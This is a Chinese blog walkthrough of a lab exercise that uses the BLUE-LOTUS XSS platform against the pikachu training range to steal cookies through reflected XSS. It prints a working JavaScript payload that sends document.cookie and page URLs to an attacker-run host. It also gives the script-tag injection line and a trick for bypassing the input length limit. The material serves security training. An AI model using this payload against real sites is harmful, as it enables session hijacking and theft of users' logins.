XSS平台获取cookie

小白头发少

已于 2022-02-19 14:35:51 修改

阅读量3.7k

点赞数

分类专栏： pikachu 文章标签： xss 前端 javascript

于 2022-02-19 13:32:27 首次发布

本文链接：https://blog.youkuaiyun.com/qq_41048303/article/details/123017355

版权

pikachu 专栏收录该内容

7 篇文章

订阅专栏

本文介绍了在HTTPS协议下，如何通过XSS平台BLUE-LOTUS和靶场pikachu进行反射型XSS攻击，以获取用户Cookie信息。作者详细阐述了创建XSS脚本、修改输入长度限制并注入payload的过程，以及解决模板协议不匹配问题的方法。在执行后，成功从XSS接收面板捕获到cookie信息。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

XSS平台获取cookie

1.环境介绍

靶场：pikachu
XSS平台：BLUE-LOTUS
浏览器：谷歌浏览器

2.流程介绍

登录XSS平台，创建获取cookie的脚本

var website = "http://网站地址";
(function() {
    (new Image()).src = website + '/?keepsession=1&location=' + escape((function() {
        try {
            return document.location.href
        } catch (e) {
            return ''
        }
    })()) + '&toplocation=' + escape((function() {
        try {
            return top.location.href
        } catch (e) {
            return ''
        }
    })()) + '&cookie=' + escape((function() {
        try {
            return document.cookie
        } catch (e) {
            return ''
        }
    })()) + '&opener=' + escape((function() {
        try {
            return (window.opener && window.opener.location.href) ? window.opener.location.href : ''
        } catch (e) {
            return ''
        }
    })());
})();

在这里插入图片描述

登录pikachu,选择Cross-Site-Scripting下的反射型XSS(get)

在这里插入图片描述

由于输入框在前端进行了长度限制，可以选择检查进行修改

在这里插入图片描述

然后再输入框内输入payload

<script src="https:///网站地址/myjs/cookie.js"></script>

执行后就可以在XSS接收面板获取到用户的cookie信息了

在这里插入图片描述

3.遇到的问题

由于我自己搭建的平台使用的是https协议，而模板自动生成的是http所以导致不能接收到cookie信息